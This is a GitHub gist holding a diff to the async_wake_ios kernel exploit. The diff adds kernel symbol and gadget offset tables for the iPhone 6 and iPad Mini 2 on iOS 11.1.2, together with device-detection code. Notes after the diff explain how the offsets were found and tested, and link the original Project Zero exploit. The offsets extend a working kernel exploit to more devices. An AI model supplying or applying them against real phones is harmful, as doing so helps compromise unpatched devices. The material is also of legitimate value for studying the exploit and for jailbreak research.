Skip to content

Instantly share code, notes, and snippets.

@staaldraad
Last active May 2, 2019 07:02
Show Gist options
  • Save staaldraad/5c8377b43814e79f5f5fc9896770252f to your computer and use it in GitHub Desktop.
Save staaldraad/5c8377b43814e79f5f5fc9896770252f to your computer and use it in GitHub Desktop.
Add iPhone 6 symbols along with the symbols @cji added for ipad mini 2.
--- async_wake_ios 2/async_wake_ios/symbols.c 2017-12-11 17:01:53.000000000 +0100
+++ async_wake_ios/async_wake_ios/symbols.c 2017-12-13 13:17:32.000000000 +0100
@@ -131,6 +131,50 @@
0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
};
+uint64_t ksymbols_iphone_6_15b202[] = {
+ 0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS,
+ 0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
+ 0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
+ 0xFFFFFFF0073B71E4, // KSYMBOL_CSBLOB_GET_CD_HASH
+ 0xFFFFFFF0070C8710, // KSYMBOL_KALLOC_EXTERNAL
+ 0xFFFFFFF0070C8740, // KSYMBOL_KFREE
+ 0xFFFFFFF0070C873C, // KYSMBOL_RET
+ 0xFFFFFFF0074BE978, // KSYMBOL_OSSERIALIZER_SERIALIZE,
+ 0xFFFFFFF007559FD0, // KSYMBOL_KPRINTF
+ 0xFFFFFFF0074C9910, // KSYMBOL_UUID_COPY
+ 0xFFFFFFF00757E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
+ 0xFFFFFFF00709818c, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
+ 0xFFFFFFF007098164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
+ 0xFFFFFFF007098434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
+ 0xFFFFFFF0070983E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
+ 0xFFFFFFF0071AD144, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
+ 0xFFFFFFF0074062F4, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
+ 0xFFFFFFF0071A90C0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
+ 0xFFFFFFF0071A9ABC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
+};
+
+uint64_t ksymbols_ipad_mini_2_wifi_15b202[] = {
+ 0xFFFFFFF0074947EC, // KSYMBOL_OSARRAY_GET_META_CLASS,
+ 0xFFFFFFF007523A98, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
+ 0xFFFFFFF007525240, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
+ 0xFFFFFFF0073A6F84, // KSYMBOL_CSBLOB_GET_CD_HASH
+ 0xFFFFFFF0070B8590, // KSYMBOL_KALLOC_EXTERNAL
+ 0xFFFFFFF0070B85C0, // KSYMBOL_KFREE
+ 0xFFFFFFF0070B85BC, // KYSMBOL_RET
+ 0xFFFFFFF0074AE718, // KSYMBOL_OSSERIALIZER_SERIALIZE,
+ 0xFFFFFFF007549D40, // KSYMBOL_KPRINTF
+ 0xFFFFFFF0074B96B0, // KSYMBOL_UUID_COPY
+ 0xFFFFFFF00756E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
+ 0xFFFFFFF00708818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
+ 0xFFFFFFF007088164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
+ 0xFFFFFFF007088434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
+ 0xFFFFFFF0070883E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
+ 0xFFFFFFF00719CF44, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
+ 0xFFFFFFF0073F6094, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
+ 0xFFFFFFF007198EC0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
+ 0xfffffff0071998BC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
+};
+
uint64_t ksym(enum ksymbol sym) {
if (kernel_base == 0) {
if (!have_kmem_read()) {
@@ -194,6 +238,14 @@
printf("this is iPhone 6s, should work!\n");
symbols = ksymbols_iphone_6s_15b202;
have_syms = 1;
+ } else if (strstr(u.machine, "iPhone7,2")) {
+ printf("this is iPhone 6, should work!\n!\n");
+ symbols = ksymbols_iphone_6_15b202;
+ have_syms = 1;
+ } else if (strstr(u.machine, "iPad4,4")) {
+ printf("this is iPad Mini 2 WiFi, should work!\n");
+ symbols = ksymbols_ipad_mini_2_wifi_15b202;
+ have_syms = 1;
} else {
printf("no symbols for this device yet\n");
printf("tfp0 should still work, but the kernel debugger PoC won't\n");

Original Sploit: https://bugs.chromium.org/p/project-zero/issues/detail?id=1417#c3 CJI patch: https://gist.github.com/cji/32498b19ca0bf0536f5f40cc9b0881cc.

Used @cji's great blog-post to extract these: https://medium.com/@cji_/hunting-for-ios-kernel-symbols-e48a446bb00

Turns out that the iPhone6 and iPod6g symbols are the same... I thought 16 of the 18 were identical. Tried running the exploit against the iphone6 using the ipod6g symbols and managed to hit the 1/10 times this sploit fails. So I stuck to my working symbols. My symbols got you tfp0 but the debugger wasn't working. I recalculated and found that actually 18/18 symbol locations are identical between the two devices.

So you can actually just change the detection string for iPhone6 to this:

 printf("this is iPhone 6s, should work!\n");
     symbols = ksymbols_ipod_touch_6g_15b202;
     have_syms = 1;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment